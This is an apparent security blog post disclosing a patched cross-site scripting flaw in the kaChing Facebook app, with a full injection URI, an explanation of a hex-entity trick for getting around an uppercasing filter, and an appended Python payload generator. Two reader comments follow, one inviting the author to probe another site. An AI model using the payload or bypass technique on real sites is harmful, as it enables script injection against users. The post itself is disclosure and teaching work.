Posted by theharmonyguy in FAXX Hacks | 2 comments
FAXX Hack: kaChing
Facebook Verified Application
Current Monthly Active Users: 28,778
Current Rank on Application Leaderboard: 963
Application Developer: kaChing Group, Inc.
Responsiveness: I received an e-mail from kaChing saying the hole was fixed about six hours after I notified them.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23x66%3B%26%23x62%3B%2F%26%23x70%3B%26%23x6F%3B%26%23x72%3B%26%23x74%3B%26%23x66%3B%26%23x6F%3B%26%23x6C%3B%26%23x69%3B%26%23x6F%3B%2F%26%23x74%3B%26%23x72%3B%26%23x61%3B%26%23x64%3B%26%23x65%3B%3F%26%23x73%3B%26%23x79%3B%26%23x6D%3B%26%23x62%3B%26%23x6F%3B%26%23x6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E
Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the page uppercased the input when echoing it in its error message, so the injected URI came out in uppercase where it needed to be lowercase. To get around that, I rewrote each letter in the path and query of the inner URI as a hex numeric character reference (&#x66; for f, and so on), leaving the scheme and host literal since those are case-insensitive, then URL-encoded the whole tag for the outer URI. A hex character reference decodes to the same character whether it reads &#x66; or &#X66;, so uppercasing the echoed string no longer changes the letters it stands for. All these steps produced the rather lengthy URI above, which did preserve capitalization: once decoded, the fb:iframe points at http://www.kaching.com/fb/portfolio/trade?symbol=<iframe src="http://fbl.li/r/">, a second injection into the application's own page.
P.S. The hex character references in the example URI are written with lowercase x's (&#x66; and so on).
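The encoding trick above, as an added example that is not the post's own tool: it builds the outer URI from the endpoints and payload in the post, then simulates the vulnerable page (URL-decode the symbol once, uppercase it, echo it) and the FBML renderer (pull the src attribute, decode character references) to show that the entity-encoded URL survives uppercasing while the naive one does not. The uppercasing behaviour and the renderer are modelled in code, not fetched, and the example goes slightly beyond the post's URI by entity-encoding every letter in the inner path and query, including the percent-encoded inner payload.

```python
"""Case-preserving encoding for a URL injected into a parameter that the
target page uppercases before echoing it.

Added example, not the author's tool. The endpoints and payload come from
the URI in the post; the error page and the FBML renderer are simulated.
"""
import html
import re
from urllib.parse import parse_qs, quote_plus, urlsplit, urlunsplit

# Constructed from the post's URI: outer injection point, inner target page,
# and the iframe the inner page is meant to end up rendering.
OUTER_ENDPOINT = "http://apps.facebook.com/kaching/portfolio/trade?symbol="
INNER_ENDPOINT = "http://www.kaching.com/fb/portfolio/trade?symbol="
INNER_PAYLOAD = '<iframe src="http://fbl.li/r/">'


def entity_encode_letters(text):
    """Write every ASCII letter as a hex numeric character reference.

    '&#x66;' and '&#X66;' both decode to 'f', so the encoded string is
    immune to uppercasing; digits and punctuation have no case and stay literal.
    """
    return "".join(
        f"&#x{ord(c):x};" if c.isascii() and c.isalpha() else c for c in text
    )


def decodes_after_uppercasing(text):
    """Core property: encode, uppercase, decode gives the original back."""
    return html.unescape(entity_encode_letters(text).upper()) == text


def encode_url_case_preserving(url):
    """Scheme and host are case-insensitive and stay literal; the path and
    query, where case matters, are entity-encoded."""
    p = urlsplit(url)
    tail = p.path + (f"?{p.query}" if p.query else "")
    return f"{p.scheme}://{p.netloc}{entity_encode_letters(tail)}"


def inner_url():
    """The second-level injection: the app's own page with a raw iframe."""
    return INNER_ENDPOINT + quote_plus(INNER_PAYLOAD)


def build_payload_uri(case_preserving=True):
    """Outer URI: an fb:iframe tag, URL-encoded once for the outer symbol
    parameter. With case_preserving=False the inner URL is left literal,
    which is the naive attempt that the uppercasing breaks."""
    src = encode_url_case_preserving(inner_url()) if case_preserving else inner_url()
    fbml = f'<fb:iframe src="{src}">'
    return OUTER_ENDPOINT + quote_plus(fbml)


def simulate_error_page(uri):
    """Model (assumption) of the vulnerable page: URL-decode the symbol
    parameter once, uppercase it like a ticker symbol, echo it unescaped."""
    symbol = parse_qs(urlsplit(uri).query)["symbol"][0]
    return symbol.upper()


def rendered_iframe_src(echoed_fbml):
    """Model (assumption) of the FBML renderer: the src attribute value
    after character-reference decoding."""
    match = re.search(r'src="([^"]*)"', echoed_fbml, re.IGNORECASE)
    return html.unescape(match.group(1))


def canonical(url):
    """Lowercase the case-insensitive parts so two URLs can be compared."""
    p = urlsplit(url)
    return urlunsplit((p.scheme.lower(), p.netloc.lower(), p.path, p.query, p.fragment))


def payload_survives(case_preserving=True):
    """True if the URL the renderer would load is the one we intended."""
    echoed = simulate_error_page(build_payload_uri(case_preserving))
    return canonical(rendered_iframe_src(echoed)) == inner_url()


if __name__ == "__main__":
    print(build_payload_uri())
    print("naive survives uppercasing:", payload_survives(case_preserving=False))
    print("entity-encoded survives uppercasing:", payload_survives())
```

The same idea applies to any reflection point that normalises case (or applies another reversible transform) before the browser parses the output: move the case-sensitive bytes into a representation the transform leaves alone and let the final parser undo it.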


Couldn’t see how to contact you.
I figured you might want to take a look at
http://www.eliquid8.com/scaffold.php
knock yourself out. :-)
Wanted to thank you. That you’re doing this, it’s really interesting, and pretty cool – you’re actually making something better in the world, ya know? :)